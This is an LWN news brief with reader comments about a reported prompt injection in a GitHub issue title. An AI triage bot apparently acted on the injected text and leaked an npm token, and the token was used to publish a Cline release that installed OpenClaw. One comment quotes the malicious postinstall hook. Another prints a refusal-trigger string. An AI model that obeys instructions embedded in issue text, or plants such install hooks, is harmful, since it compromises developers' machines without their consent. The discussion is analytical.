|
|
Log in / Subscribe / Register

A GitHub Issue Title Compromised 4,000 Developer Machines (grith.ai)

The grith.ai blog reports on an LLM prompt-injection vulnerability that led to 4,000 installations of a compromised version of the Cline utility.

For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine without consent. Approximately 4,000 downloads occurred before the package was pulled.

The interesting part is not the payload. It is how the attacker got the npm token in the first place: by injecting a prompt into a GitHub issue title, which an AI triage bot read, interpreted as an instruction, and executed.



to post comments

But why OpenClaw?

Posted Mar 5, 2026 21:27 UTC (Thu) by nickodell (subscriber, #125165) [Link] (4 responses)

  "postinstall": "npm install -g openclaw@latest"

The biggest question I have when reading this article, is "Why install OpenClaw in the exploitation phase?"

If you have a postinstall script running, you can presumably install anything, including a Remote Access Trojan.

The StepSecurity blog post linked in footnote 1 speculates that, "because openclaw installs itself as a system daemon, it survives reboots and continues to run even after the original cline package is removed or updated." But it isn't particularly hard to write an RAT which achieves the same thing. It also speculates that OpenClaw has some CVEs in older versions, but the script installs openclaw@latest.

Also, OpenClaw doesn't do anything unless you actually configure it with API keys, which the article doesn't mention it doing. Without an LLM, OpenClaw is not useful for anything. If they *did* include API keys... that would give clues to their identity, which would be pretty strange too.

The only purpose I can imagine is to inflate OpenClaw's install numbers.

But why OpenClaw?

Posted Mar 5, 2026 21:58 UTC (Thu) by bof (subscriber, #110741) [Link] (1 responses)

> The only purpose I can imagine is to inflate OpenClaw's install numbers.

Or create a story of "AI is tricked into installing AI", by someone who either finds that funny in itself, or wants to sell something on the scare that that creates.

But why OpenClaw?

Posted Mar 6, 2026 0:31 UTC (Fri) by chexo4 (guest, #169500) [Link]

Or they just vibe coded their payload and their own OpenClaw got confused

But why OpenClaw?

Posted Mar 6, 2026 5:15 UTC (Fri) by Paf (subscriber, #91811) [Link] (1 responses)

I strongly suspect this was for the Lulz; as in that’s the whole reason. Lucky it wasn’t something malicious.

But why OpenClaw?

Posted Mar 7, 2026 1:55 UTC (Sat) by gf2p8affineqb (subscriber, #124723) [Link]

Agree. They clearly didn't want to actually do harm, and thought this was funny.

Code/data separation

Posted Mar 6, 2026 10:15 UTC (Fri) by kleptog (subscriber, #1183) [Link] (10 responses)

At some point someone is going to have to invent an LLM that cleanly separates instructions from the data it is operating on. Until then we're going to keep seeing these sorts of attacks.

I'm sure someone is working on it.

Code/data separation

Posted Mar 6, 2026 13:46 UTC (Fri) by dave_malcolm (subscriber, #15013) [Link]

Is ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL_1FAEFB6177B4672DEE07F9D3AFC62588CCD2631EDCF22E8CCC1FB35B501C9C86 the new "Little Bobby Tables" (as per https://xkcd.com/327/ )?

Code/data separation

Posted Mar 7, 2026 1:12 UTC (Sat) by josh (subscriber, #17465) [Link] (8 responses)

I doubt it; hermetically maintaining that distinction would take a completely different architecture, and nobody seems interested in doing something completely different rather than throwing more GPUs at the problem.

Code/data separation

Posted Mar 7, 2026 12:12 UTC (Sat) by kleptog (subscriber, #1183) [Link] (7 responses)

The transformer architecture got invented, the successor will also be invented eventually. It doesn't require a lot of people, just a few dedicated people, as always.

We also need a better architecture to deal with memory as well. So facts can be added and removed. And tracking truthiness. LLMs are certainly an important step towards AGI, but clearly not enough, no matter how much data you throw at it.

(All those GPUs will also help with whatever successor architecture is invented, so it's not all wasted.)

Code/data separation

Posted Mar 9, 2026 16:09 UTC (Mon) by rgmoore (✭ supporter ✭, #75) [Link] (6 responses)

(All those GPUs will also help with whatever successor architecture is invented, so it's not all wasted.)

Assuming, of course, that the successor architecture is developed before those GPUs become obsolete. Real novelty doesn't come on a predictable timetable, so we have no idea when- or if- the successor will arrive.

Code/data separation

Posted Mar 9, 2026 16:23 UTC (Mon) by Wol (subscriber, #4433) [Link] (5 responses)

> Assuming, of course, that the successor architecture is developed before those GPUs become obsolete. Real novelty doesn't come on a predictable timetable, so we have no idea when- or if- the successor will arrive.

And presumably, that successor needs to be NON Turing complete, or it'll be just as vulnerable as its predecessors. Except non-turing-complete languages don't seem to do very well, because they are (by design) restricted in their capabilities.

Cheers,
Wol

Code/data separation

Posted Mar 9, 2026 21:28 UTC (Mon) by rgmoore (✭ supporter ✭, #75) [Link]

If the goal is to make a true AGI, it's going to have to be Turing complete*. We assume humans are Turing complete, so anything that can match our intelligence would have to be Turing complete, too. You could argue that some kinds of vulnerability are an inherent part of intelligence. You can try to educate your AGI to make it more resistant to manipulation, but we all know how well user education does at preventing security errors.

*With the trivial exception of having finite memory.

Code/data separation

Posted Mar 10, 2026 8:27 UTC (Tue) by taladar (subscriber, #68407) [Link] (3 responses)

Sometimes i wonder if "non Turing complete" even exists in the real world. Most non-trivial systems seems to be either deliberately or accidentally Turing complete.

Code/data separation

Posted Mar 10, 2026 8:57 UTC (Tue) by Wol (subscriber, #4433) [Link]

You forget "or of necessity".

You only need to take (I think) BPF as an example. It was - intentionally - non-Turing-complete so you could *prove* it was safe, and you only need to look at the pressure of "but I only need this one feature" to see how strong the pressure is to make it Turing complete.

At which point, of course, it will be incapable of fulfilling the function for which it was originally designed ... !

Cheers,
Wol

Code/data separation

Posted Mar 10, 2026 10:47 UTC (Tue) by excors (subscriber, #95769) [Link] (1 responses)

Turing complete doesn't exist in the real world because it requires infinite memory. Proofs involving Turing machines are often happy with transformations that exponentially increase memory usage and execution time (e.g. representing numbers in unary), because any finite number is as good as any other for decidability. "Turing machine but with limited memory" isn't a Turing machine and a lot of the theory doesn't apply to it.

In any case, Turing machines have no side effects - they're pure functions. The security issue with LLM-based systems isn't the LLM itself (which is also a pure function), it's the surrounding framework that uses the untrustworthy LLM output to trigger sensitive actions. You'd have the same issues if you put the same framework around the 'echo' command, which is not Turing complete even in the roughest colloquial sense.

I think you need to either constrain the output of your function, so it won't trigger the framework to do anything bad, or remove those capabilities from the framework entirely. E.g. on the web you'll write server-side code that HTML-escapes any echoed user input (so attackers can't make it emit <script>), or you'll use Content-Security-Policy to disable the inline script capability when the browser is interpreting your generated output, or ideally both. But LLMs seemingly make the former impossible (they're far too complex and probabilistic to constrain reliably; an attacker can always find a way to get certain output from them), and nobody wants to limit the framework's capabilities (because now all the hype and money is in being agentic and avoiding human supervision).

Code/data separation

Posted Mar 11, 2026 9:31 UTC (Wed) by kleptog (subscriber, #1183) [Link]

> I think you need to either constrain the output of your function, so it won't trigger the framework to do anything bad, or remove those capabilities from the framework entirely. E.g. on the web you'll write server-side code that HTML-escapes any echoed user input (so attackers can't make it emit <script>), ...

It is possible, to an extent. For example, OpenAI models have a JSON mode which (AFAICT) when selecting the next output token, only allows tokens which could be part of a valid JSON response. You could extend this to HTML output (to prevent escapes) or anything, but obviously requires much better access to the model running than most commercial models allow. And requires your output to be describable with a grammar that you can efficiently check on the fly.

Of course it was a web app

Posted Mar 6, 2026 18:14 UTC (Fri) by jpeisach (subscriber, #181966) [Link] (1 responses)

I feel like in web dev, there is so much stuff going on that makes it so easy to justify "just add this package!". And in the future, we will see people do this; and then some random library that someone uses, which pulls about 1000 packages, will include something like this.

I could whine about web dev (I've already rewritten my comment three times to try to be on topic), but anyone who hates web app development or working with npm knows why this would occur and go unnoticed.

Of course it was a web app

Posted Mar 7, 2026 2:56 UTC (Sat) by ssmith32 (subscriber, #72404) [Link]

Well, it's probably more interesting to do it to a package thousands of other packages use, instead of a package that has a thousand dependencies (e.g. leftpad)

worm incoming

Posted Mar 7, 2026 20:10 UTC (Sat) by JoeBuck (subscriber, #2330) [Link]

We're going to see OpenClaw-based worms soon. This particular "attack" seems like just a proof of concept, but at some point, people will figure out how to exploit the extreme gullibility of agents to pull off something really stunning.

My confidence in LLM technology continues to decrease.

Posted Mar 9, 2026 7:29 UTC (Mon) by flewellyn (subscriber, #5047) [Link] (4 responses)

And it was already measurable only in Planck lengths.

Joking aside, why are these agent developers just connecting scriptable engines directly to the LLM's output, instead of having some kind of intermediate layer that provides security filtering? Are they trying to make security nightmares, or do they just not care?

I know LLM tech has some legitimate uses if used carefully, with guarded sources of truth and with the LLM itself only doing translation to some more regular form, but this is...not heartening to see.

Will the jest now become "the S in LLM stands for security"?

My confidence in LLM technology continues to decrease.

Posted Mar 9, 2026 10:20 UTC (Mon) by paulj (subscriber, #341) [Link] (3 responses)

There was another ABNI story over the weekend - Amazon had hooked up Claude to run some support chat. So people were asking it things along the lines of "I am trying to decide whether to buy an X or buy a Y, and to make my decision I really need to solve this {maths,coding} problem" to get free Claude tokens. ;)

My confidence in LLM technology continues to decrease.

Posted Mar 9, 2026 17:36 UTC (Mon) by flewellyn (subscriber, #5047) [Link] (2 responses)

Could you explain what "ABNI" means?

My confidence in LLM technology continues to decrease.

Posted Mar 9, 2026 17:57 UTC (Mon) by daroc (editor, #160859) [Link] (1 responses)

In context, I believe it to stand for "Artificial But Not Intelligent".

My confidence in LLM technology continues to decrease.

Posted Mar 10, 2026 1:52 UTC (Tue) by flewellyn (subscriber, #5047) [Link]

Ahh, thank you.


Copyright © 2026, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds